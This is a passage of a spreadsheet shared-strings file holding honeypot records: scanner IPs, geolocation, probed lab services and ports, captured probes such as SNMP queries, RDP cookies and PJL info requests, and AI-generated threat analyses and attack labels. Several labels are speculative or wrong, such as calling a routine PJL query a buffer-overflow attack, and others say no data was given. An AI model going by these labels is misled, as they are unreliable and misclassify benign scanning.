to extract sensitive information. &amp;&amp; Unknown activity detected for Oracle service, possible probing or scanning attempt. No explicit malicious action observed. Data indicates incomplete or unsuccessful operation.</t>
  </si>
  <si>
    <t xml:space="preserve">  &amp;&amp; BruteForce &amp;&amp; BlueKeep Attack &amp;&amp; Rdp Bruteforce</t>
  </si>
  <si>
    <t>dd3bd5364e8e07e9cac87a6761b56db9</t>
  </si>
  <si>
    <t>223.205.61.222</t>
  </si>
  <si>
    <t>mx-ll-223.205.61-222.dynamic.3bb.co.th</t>
  </si>
  <si>
    <t>12</t>
  </si>
  <si>
    <t>Nonthaburi</t>
  </si>
  <si>
    <t>Pak Kret</t>
  </si>
  <si>
    <t>1608048</t>
  </si>
  <si>
    <t>11120</t>
  </si>
  <si>
    <t>13.8995</t>
  </si>
  <si>
    <t>100.543</t>
  </si>
  <si>
    <t>TTBP-AS-AP</t>
  </si>
  <si>
    <t>::ffff:dfcd:3dde</t>
  </si>
  <si>
    <t>fd9cb944fe4728f7fc6007c377b2b720</t>
  </si>
  <si>
    <t>154.222.24.139</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H38</t>
  </si>
  <si>
    <t>3306&amp;&amp;33823&amp;&amp;1433</t>
  </si>
  <si>
    <t>HK</t>
  </si>
  <si>
    <t>Hong Kong</t>
  </si>
  <si>
    <t>Kowloon</t>
  </si>
  <si>
    <t>1819729</t>
  </si>
  <si>
    <t>999077</t>
  </si>
  <si>
    <t>22.3193</t>
  </si>
  <si>
    <t>114.169</t>
  </si>
  <si>
    <t>137899</t>
  </si>
  <si>
    <t>I LAYER LIMITED</t>
  </si>
  <si>
    <t>Vapeline Technology</t>
  </si>
  <si>
    <t>2016-09-23</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;NA&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:9ade:188b</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze or describe any possible malicious activity. &amp;&amp; There is insufficient data to analyze, indicating no malicious activity has been detected so far. No connections or attempts have been logged. This could be due to lack of traffic or effective security measures. &amp;&amp; This log indicates an attempt to access Microsoft SQL Server using a default or unknown connection method, suggesting potential unauthorized database access. The lack of specified credentials may indicate a brute-force attack or attempted exploitation of a vulnerability. Further investigation is needed to determine the nature and intent behind this activity. &amp;&amp; Attempt to exploit database vulnerability, possibly attempting unauthorized access or SQL injection. Data seems to be related to Microsoft SQL Server. Activity appears to be reconnaissance for potential attack. &amp;&amp; This indicates an attempt to access MySQL database without specifying a specific database, which could be a reconnaissance or scanning activity. 
It may be an initial step by attackers before attempting to exploit vulnerabilities. 
The lack of specific database query suggests the attacker is probing the system for potential entry points. &amp;&amp; No malicious activity detected for MySQL service.</t>
  </si>
  <si>
    <t>There is no log data provided to analyze. Can you please provide the actual log data for me to assist with naming the types of attacks? &amp;&amp; I'd be happy to help analyze the log data, but since there is no log data provided, I'll wait for the actual data. Please provide the log data and I'll be able to assist you with naming the type of attack in a short phrase (max 2 words). &amp;&amp; SQL Inject &amp;&amp; SQL Injection</t>
  </si>
  <si>
    <t>8ee6183ae812f2c23f2c8e43a28341e3</t>
  </si>
  <si>
    <t>205.210.31.176</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Email Spoofing</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_NTP_H9&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_SIP_H46&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_SNMP_H38&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H15&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_NTP_H26&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_NTP_H24&amp;&amp;SMA-LAB_SOCKS5_H4&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_POP3_H26&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_FTP_H25&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_NTP_H41&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_LDAP_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;9100&amp;&amp;53073&amp;&amp;161&amp;&amp;389&amp;&amp;21&amp;&amp;143&amp;&amp;27515&amp;&amp;1080&amp;&amp;1521&amp;&amp;6379&amp;&amp;443&amp;&amp;445&amp;&amp;23&amp;&amp;5900&amp;&amp;51561&amp;&amp;NA&amp;&amp;110&amp;&amp;3389&amp;&amp;1433&amp;&amp;51878&amp;&amp;5432&amp;&amp;3306&amp;&amp;55703&amp;&amp;6667&amp;&amp;80&amp;&amp;52969&amp;&amp;49790&amp;&amp;51967&amp;&amp;55325&amp;&amp;57192&amp;&amp;59240&amp;&amp;54399&amp;&amp;54829&amp;&amp;53455&amp;&amp;51791</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>37.3835</t>
  </si>
  <si>
    <t>2022-01-11</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;GET&amp;&amp;stshash&amp;&amp;NA&amp;&amp;command&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,59284)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,59290)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,65468)}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yHHzpByOc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aqeqpY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DQizNk'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,64100)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,62562)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,62570)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EvSIkINcM'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hIEXBJkAa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xOamVn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aofCby'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xrPbTaAAr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aSIsSS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VpPigo'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,64376)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,64382)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.176,64384)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qimjPtBBC'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1fb0</t>
  </si>
  <si>
    <t>No malicious activity detected, socket is not being used. No connection attempt or packet received, indicating no interaction with service. Socket status is unknown due to lack of data available. &amp;&amp; No significant malicious activity detected as SOCKS5 protocol is not specified, indicating no relevant information was found for this connection. 
This could be due to the service being down or inactive at that point. 
It's also possible the scanner didn't support it or simply skipped it. &amp;&amp; This log indicates an attempt to access or exploit a service for potential malicious purposes, possibly as part of a reconnaissance phase. It suggests the target is trying to gather information about the system's configuration or identify vulnerabilities. The lack of specific details in the log implies that the activity was likely at an early stage of exploitation. &amp;&amp; Unknown client attempted to access PJL (Printer Job Language) service. This may indicate an attempt to exploit printer or printing system vulnerabilities. The lack of further information suggests the activity was likely reconnaissance or a scan. &amp;&amp; Potential malicious activity involves an attacker sending a command to gather information about the system. The command is likely used for reconnaissance or enumeration purposes. It may be part of a larger attack to gain access to sensitive data or exploit vulnerabilities. &amp;&amp; Potential malicious activity: The system has been accessed using a print job command, which could be used to exploit vulnerabilities or spread malware through the network. This behavior is often associated with printer-based attacks and may indicate unauthorized access. It may also be an attempt to exploit a known vulnerability in a print service. &amp;&amp; The log suggests possible malicious activity involving unauthorized printer control commands, potentially used for spreading malware or exploiting vulnerabilities through printer ports. This could be an attempt to access and manipulate the printer's internal settings or inject malicious code. The command is not a standard print job request. &amp;&amp; Possible malicious activity detected, an unknown command is being executed with printer job (PJL) protocol to gather information about the system's printer settings and possibly exploit vulnerabilities. This behavior could be indicative of reconnaissance or lateral movement attempts by attackers. &amp;&amp; Malicious activity detected, potentially a printer attack with malicious printing of identification information to the system. 
The attacker is sending a specific command to gather device details. The goal might be to harvest sensitive data from connected devices. &amp;&amp; Possible malicious activity involves an attempt to send printer job information for unknown or malicious purposes, possibly using it as a vector for further exploitation or data exfiltration. &amp;&amp; Malicious attempts to exploit printer services, possibly for unauthorized access or data extraction. The attempt is likely a reconnaissance probe to gather information about the target system's configuration. This could be part of a larger attack to compromise the system further. &amp;&amp; This log suggests a printer spooler buffer overflow attack, where an attacker is attempting to inject malicious code into the printer system through a specific command. The attacker is sending a formatted printer control language string with malicious intent. This could potentially lead to unauthorized access or system compromise. &amp;&amp; No log data provided, cannot analyze malicious activity.</t>
  </si>
  <si>
    <t>Proxy Attack &amp;&amp; SYN Flood</t>
  </si>
  <si>
    <t>dc2559fcd0cc976764d80aceacc70ea8</t>
  </si>
  <si>
    <t>205.210.31.156</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Credential_Stuffing_Attack_High</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_MYSQL_H21&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_PJL_H25&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SNMP_H3&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_FTP_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;445&amp;&amp;389&amp;&amp;143&amp;&amp;54766&amp;&amp;21&amp;&amp;5432&amp;&amp;1080&amp;&amp;3306&amp;&amp;9100&amp;&amp;56934&amp;&amp;1433&amp;&amp;110&amp;&amp;161&amp;&amp;6379&amp;&amp;NA&amp;&amp;5900&amp;&amp;3389&amp;&amp;80&amp;&amp;1521&amp;&amp;53303&amp;&amp;53659</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;command&amp;&amp;request&amp;&amp;stshash&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yulNZc'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uOSYcyjeD'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fwhhbg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JihDcI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hMlDUKjKQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wGcWei'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DmhcNo'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FHhOTOQKj'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=PlTsHg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UbYJng'}}&amp;&amp;{Data_POP3:NA}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f9c</t>
  </si>
  <si>
    <t>Low&amp;&amp;High</t>
  </si>
  <si>
    <t>Potential brute-force login attempt on an IMAP service, possibly trying to exploit weak passwords or identify vulnerable accounts. The CAPABILITY command is being sent to gather information about the server capabilities. This could be a reconnaissance step in a larger malicious operation.</t>
  </si>
  <si>
    <t>Port Scan</t>
  </si>
  <si>
    <t>d120a83f00b1aca92fc1bbcde461ae12</t>
  </si>
  <si>
    <t>221.157.193.130</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_DNS_H29&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>22&amp;&amp;5900&amp;&amp;80&amp;&amp;1080&amp;&amp;389&amp;&amp;445&amp;&amp;53&amp;&amp;23565&amp;&amp;23&amp;&amp;51434</t>
  </si>
  <si>
    <t>{'korea.services.net': ['unknown']}</t>
  </si>
  <si>
    <t>KR</t>
  </si>
  <si>
    <t>South Korea</t>
  </si>
  <si>
    <t>41</t>
  </si>
  <si>
    <t>Gyeonggi-do</t>
  </si>
  <si>
    <t>Seongnam-si</t>
  </si>
  <si>
    <t>Seongnam-si (Jeongja-dong)</t>
  </si>
  <si>
    <t>1897000</t>
  </si>
  <si>
    <t>37.3638</t>
  </si>
  <si>
    <t>127.116</t>
  </si>
  <si>
    <t>4766</t>
  </si>
  <si>
    <t>Korea Telecom</t>
  </si>
  <si>
    <t>2003-04-17</t>
  </si>
  <si>
    <t>KORNET</t>
  </si>
  <si>
    <t>None&amp;&amp;connection&amp;&amp;NA</t>
  </si>
  <si>
    <t>None&amp;&amp;{Data_TELNET:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dd9d:c182</t>
  </si>
  <si>
    <t>0dc4c4b84b72ccef744c138ff0565d4e</t>
  </si>
  <si>
    <t>205.210.31.23</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_POSTGRES_H23&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_FTP_H41&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MSSQL_H11&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_LDAP_H2&amp;&amp;SMA-LAB_IMAP_H6&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_SNMP_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_SNMP_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;9100&amp;&amp;23&amp;&amp;110&amp;&amp;3306&amp;&amp;5432&amp;&amp;80&amp;&amp;143&amp;&amp;21&amp;&amp;63348&amp;&amp;1433&amp;&amp;5900&amp;&amp;389&amp;&amp;1080&amp;&amp;NA&amp;&amp;1521&amp;&amp;3389&amp;&amp;445&amp;&amp;51557&amp;&amp;443</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']}</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;stshash&amp;&amp;command&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cUfwVaPAg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=swKKeJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tymSWE'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WppYMi'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GFQDdB'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.23,60690)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HYqKMssYq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yBGvvX'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WPoHYK'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MRnbsFdhx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sxDdlK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pfXRCv'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POSTGRES:NA}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f17</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze malicious activity. &amp;&amp; An attempt to use TLS encryption during FTP authentication, possibly indicative of an unauthorized access attempt or malware scanning activity. This could be related to an attacker trying to establish a secure connection for malicious purposes. Further investigation is needed to determine the intent behind this action. &amp;&amp; Possible malicious activity involves an unauthorized attempt to establish a secure connection (TLS) during the AUTH command of a file transfer service, suggesting a potential exploitation attempt or brute-force login attempt. This indicates someone is trying to connect securely but may not have legitimate access. It could be part of a larger attack pattern. &amp;&amp; Malicious actors are attempting to access Microsoft SQL Server database, suggesting a potential exploitation of a vulnerability or brute force attack attempt. 
This could be indicative of a larger cyber attack aimed at gaining unauthorized access to sensitive data. 
The lack of authentication information (NA) suggests the attacker is likely using automated tools or brute force methods to gain access.</t>
  </si>
  <si>
    <t>There doesn't seem to be any log data provided. Could you please provide the actual log data from the honeypot so I can assist with analyzing it? &amp;&amp; FTP TLS Auth &amp;&amp; Tls Auth Bypass</t>
  </si>
  <si>
    <t>be4a1933fe9238dadb0c864f27543580</t>
  </si>
  <si>
    <t>205.210.31.50</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_SOCKS5_H30&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_PJL_H41&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_NTP_H38&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_MYSQL_H37&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_POP3_H27&amp;&amp;SMA-LAB_IRC_H18&amp;&amp;SMA-LAB_IRC_H7&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_FTP_H16&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LA